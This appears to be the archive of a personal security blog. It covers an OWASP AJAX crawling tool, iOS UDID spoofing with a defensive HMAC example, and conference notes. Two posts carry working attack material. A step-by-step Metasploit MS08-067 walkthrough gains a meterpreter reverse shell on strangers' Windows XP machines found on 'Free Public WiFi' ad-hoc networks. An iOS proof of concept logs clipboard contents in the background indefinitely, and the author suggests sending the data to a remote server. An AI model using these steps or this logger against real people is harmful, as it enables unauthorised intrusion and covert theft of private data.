OWASP AJAX Crawling Tool BETA release and how you can help!

Filed under News, Tools

Hey everybody! Sorry I have been MIA for so long. I'm currently doing some training, and it's requiring 13-hour work days.

Anyway, there is an update to ACT that will enable users to use it as part of scripting, etc.

How you can help

I have released it as the first beta release for two reasons:

  1. I need more bug reports
  2. I want to know what new features people want

So, please download the new release here: http://code.google.com/p/fuzzops-ng/downloads/list
And when you find a bug, or think of a new feature, log it here: http://code.google.com/p/fuzzops-ng/issues/list

Also…

I am looking for a developer with interest/experience with the ZAP (Zed Attack Proxy) OWASP tool. Simon (the creator) and I have been discussing a plugin module to integrate ACT into ZAP as an installable extension (NOT a combination of the tools). If you are interested, please contact me.

AJAX Crawling Tool added to OWASP

Filed under News

Yup, my AJAX Crawling Tool has been accepted as part of OWASP!

Check it out: https://www.owasp.org/index.php/OWASP_AJAX_Crawling_Tool

Exploiting “Free Public WiFi”

Filed under Network Hacking

A few weeks ago Joshua Wright did a SANS webcast on Exploiting Modern Wireless Networks. For a long time WiFi attacks have focused on either cracking WEP or brute-forcing a WPA shared key. Josh goes over some of the newer attack vectors against wireless and how you can use them in a penetration test.

My favorite slide had to do with that obscure "Free Public WiFi" SSID that we see all over the place. I see these all the time at airports, but also at hotels and other commonly used public wifi areas. Apparently this is the default name for ad-hoc networks created by Windows XP SP2. Obviously this gets us excited (MS08-067). If they are running an XP SP2 box, we can probably assume that the machine is not frequently administered, and most likely not patched. Here are the simple steps that Josh Wright provided to exploit this machine:

  • Connect to the ad-hoc network
# iwconfig wlan1 essid "Free Public WiFi" mode adhoc
  • Use tcpdump to find the IP (the source address in the line below) of the XP box hosting the ad-hoc network. Note: the hosting box will be broadcasting NetBIOS packets to help configure associated clients.
# tcpdump -ni wlan1 -s0 -nt
IP 169.254.131.118.138 > 169.254.255.255.138: NBT UDP PACKET(138)
  • Configure your IP on the same link-local range (this is the address the reverse shell shovels back to)
# ifconfig wlan1 169.254.1.1 netmask 255.255.0.0
  • Own It
# msfconsole
# use exploit/windows/smb/ms08_067_netapi
# set PAYLOAD windows/meterpreter/reverse_tcp
# set LPORT 9999
# set RHOST 169.254.131.118
# set LHOST 169.254.1.1
# exploit

Pretty straightforward, huh? As always, thanks to the SANS teams for their awesome contributions to the security industry. Make sure to check out the new SANS Pen Testing blog! It's fantastic!

Demo: Enumerating AJAX Applications with ACT (AJAX Crawling Tool)

Filed under Tools

I created this video in response to multiple and varying requests for information about the tool I just released. This demo shows how ACT can be used to more thoroughly enumerate an AJAX application, and then leverage those findings via your favorite attack proxy.

Go check out the demo here: http://vimeo.com/31059474

and download ACT here: http://code.google.com/p/fuzzops-ng/downloads/list

“It’s alive!”… and so am I!

Filed under Tools

Hey everybody! Sorry I haven't posted recently! Lots has been going on here at school and with work. But don't be dismayed! I have been hard at work! In the past I had posted my Web App and Web Service fuzzer. Well, after reviewing the code, and the level of bugs, I took it back to the drawing board! What I am releasing now is the alpha version of the crawling module of the tool.

Why the rewrite?

Well, the first release (FuzzOps) was very buggy and not very well designed. It did not allow for the type of flexibility that I wanted from the tool.

Why did you modularize the crawler?

After reviewing the purpose of the tool and hearing about some needs in the community, I felt that a portion of the project (the fuzzer) would essentially be "reinventing the wheel". However, the crawler itself is a unique piece of functionality that lots of security professionals would like to use. So rather than tying the AJAX crawling code to the fuzzer, I have made it a module that can be used with any proxy out there. Tying these tools together then allows security experts to properly crawl their target web applications using their favorite proxy.

 

ACT (AJAX Crawling Tool) is part of the FuzzOps-NG project. You can download it here:

http://code.google.com/p/fuzzops-ng/downloads/list

Make sure to read the README on the wiki page.

 

NOTE: ACT is heavily dependent upon the work done by Selenium and Crawljax. Please acknowledge them for this tool's heavy lifting.

Security Implications of Apple’s Transition Away From UDIDs

Filed under Research

It was reported that as of iOS 5 Apple will no longer permit developers to use the device UDID (Unique Device Identifier). This has numerous functionality implications which will become evident (if they aren't already). You can read the article here.

UDID

For those unfamiliar with iOS development, it is important to understand how UDIDs are used in applications. Rather than storing credentials or a generated user ID in the user's plist (property list) file, many applications make a local API call to fetch the UDID and use it as the primary means of identification between the server and the client. This removes the need to store passwords or other login credentials in a less safe environment. However, with the proposed changes, developers will now need to generate their own unique IDs and store them within the application's plist file.

Application Spoofing/Hijacking

This change, however, may leave the device open to spoofing attacks (both targeted and brute-forced). Because the application-generated identifier will now reside in user-accessible storage, the application is forced to trust possibly modified data. Any salting or client-to-server encryption is also bypassed, because the application applies it after fetching the stored ID and before contacting the server. This is clearly distinct from normal network spoofing/hijacking, but can have the same result.

Solution

Admittedly, I haven't put a ton of thought into a thorough solution. However, my initial assessment seems to indicate that an application could encrypt or encode the unique ID before sending it to the client, and again before storing it in the plist file. This would make modification of a stored ID impossible, as well as obfuscate it in transit to prevent sniffing the unencrypted ID. This bypasses the spoofing, as well as preventing a pass-the-hash type attack.
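One concrete way to give a stored identifier the tamper-resistance the section is after, as an added example that is not code from the post or from any iOS project: the server keeps a secret key and hands each client a token made of an ID plus an HMAC tag over that ID, and the app stores the token opaquely. A client that edits the ID in its plist cannot produce a matching tag, so the server rejects it. A plain reversible encoding would not achieve this, because the client could decode, edit and re-encode the value, which is why the example uses a keyed MAC rather than encoding. The NaiveServer and MacServer classes, the AppDeviceID plist key, the dictionary standing in for the plist, and the account names are all constructed for the example.

```python
"""Server-issued, tamper-evident app identifiers (constructed example)."""
import hashlib
import hmac
import secrets


class NaiveServer:
    """Identifies the client solely by the ID value it sends.

    This mirrors the risky pattern: the app reads an ID out of its plist and
    the server treats whatever arrives as proof of identity.
    """

    def __init__(self):
        self.accounts = {}  # device_id -> account name (constructed sample data)

    def register(self, account):
        device_id = secrets.token_hex(8)
        self.accounts[device_id] = account
        return device_id

    def whoami(self, device_id):
        return self.accounts.get(device_id)


class MacServer:
    """Issues "<id>.<tag>" tokens where tag = HMAC-SHA256(server_key, id).

    The key never leaves the server, so a client that edits the id in its
    plist cannot compute a matching tag and the server rejects the token.
    """

    def __init__(self, key):
        self._key = key
        self.accounts = {}

    def _tag(self, device_id):
        return hmac.new(self._key, device_id.encode(), hashlib.sha256).hexdigest()

    def register(self, account):
        device_id = secrets.token_hex(8)
        self.accounts[device_id] = account
        return f"{device_id}.{self._tag(device_id)}"

    def whoami(self, token):
        device_id, sep, tag = token.partition(".")
        if not sep:
            return None  # malformed token: no tag at all
        expected = self._tag(device_id)
        # Constant-time comparison so the check does not leak how many bytes matched
        if not hmac.compare_digest(tag.encode(), expected.encode()):
            return None
        return self.accounts.get(device_id)


def naive_spoof():
    """Stored ID edited to another account's ID; the naive server accepts it."""
    server = NaiveServer()
    victim_id = server.register("victim")
    plist = {"AppDeviceID": server.register("attacker")}  # the app's own plist (constructed)
    plist["AppDeviceID"] = victim_id                        # edited in user-accessible storage
    return server.whoami(plist["AppDeviceID"])


def mac_spoof():
    """Same edit against the MAC server: the tag no longer matches, so it is rejected."""
    server = MacServer(secrets.token_bytes(32))
    victim_id = server.register("victim").partition(".")[0]
    plist = {"AppDeviceID": server.register("attacker")}
    own_tag = plist["AppDeviceID"].partition(".")[2]
    plist["AppDeviceID"] = f"{victim_id}.{own_tag}"        # victim's id, attacker's own tag
    return server.whoami(plist["AppDeviceID"])


def mac_legit():
    """An unmodified token still identifies its owner."""
    server = MacServer(secrets.token_bytes(32))
    token = server.register("alice")
    return server.whoami(token)


if __name__ == "__main__":
    print("naive server sees the edited plist as:", naive_spoof())  # victim
    print("MAC server sees the edited plist as:", mac_spoof())      # None
    print("MAC server sees the real owner as:", mac_legit())        # alice
```

The MAC defeats both the targeted edit and brute-forced guessing of IDs, because every candidate needs a tag only the server can compute. It does not turn the token into something safe to expose: a token copied wholesale from a device is still a bearer credential, so it still needs TLS in transit and Keychain-class protection at rest, and the server key must be rotated if it is ever disclosed.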

EDIT: Here is the proof-of-concept

iOS App Spoofing through plist Hijacking from Skyler Onken on Vimeo.

BSidesLosAngeles Aftermath

Filed under Research

Well, BSidesLosAngeles was great!! Lots of great information.

I am providing a link to the slides from my presentation. I also want to give a special thanks to Dan Manson for his help.

I recommend going to the SlideShare page and downloading the actual ppt. I use quite a few transitions, so the SlideShare rendering overlaps those.

Solving the US Cyber Challenge: Cyber Quest

And the pcap: http://www.mediafire.com/?33xynmkr75zeauy

Scripting Language Quick Reference and Comparison

Filed under Tools

Here is a sweet link shared with me by a friend from the US Cyber Challenge. It's a great reference for Python, Perl, PHP and Ruby. It includes simple examples of common scripting tasks, and shows them side-by-side in all 4 languages.

Hyperpolyglot

Enjoy!

BSidesLosAngeles Presentation

Filed under Uncategorized

I will be presenting at BSidesLosAngeles. I will be going over the previous USCC Cyber Quest. Should be interesting. If you're from the area make sure you get tickets soon!

http://www.securitybsides.com/w/page/36552449/BSidesLosAngeles

Simple iOS Pasteboard Logger

Filed under Research

I just went through the iGoat project released by OWASP. Some of the exercises were a bit fun. Although not very complex or in depth, they pointed out security holes and aspects of iOS technology that I was not aware of.

One of the exercises noted that a general UIPasteboard object exists that all applications have access to unless they declare their own. I figured, hey, why not create a sort of logger that would snag the data whenever it was copied to the clipboard. Easy enough.

Here is the code. It's very simple. Not really practical considering it would never get into the App Store, but a fun proof-of-concept:

@implementation iSneakAppDelegate
... snip ...
- (void)applicationDidEnterBackground:(UIApplication *)application
{
    dispatch_async(dispatch_get_global_queue(DISPATCH_QUEUE_PRIORITY_DEFAULT, 0), ^{
        NSLog(@"starting...");
        UIApplication *app = [UIApplication sharedApplication];
        // UIBackgroundTaskIdentifier is an integer handle, not a pointer
        UIBackgroundTaskIdentifier bgTask;
        // Leave the expiration handler empty; the task is never explicitly ended
        bgTask = [app beginBackgroundTaskWithExpirationHandler:^{}];
        // Remember the current clipboard contents so only changes get logged
        NSString *string = [[UIPasteboard generalPasteboard] string];
        while (true) {
            NSString *newString = [[UIPasteboard generalPasteboard] string];
            if (newString != nil && ![newString isEqualToString:string]) {
                NSLog(@"Pasteboard: %@", newString);
                string = newString;
            }
            sleep(5); // pause the loop for a few seconds
        }
    });
}

This is pretty straightforward. It starts a background task, giving it a blank expiration handler to ensure that the process continues forever. I then store the current value of the clipboard and begin a loop. The loop checks for any changes to the clipboard contents every 5 seconds. If the contents are different, it logs them.

Obviously, other things you would want to do include setting up a remote server that you could push the logged data out to. Also, UIPasteboard can hold other things besides strings, so it would be nice to add some robustness to handle other forms of data.
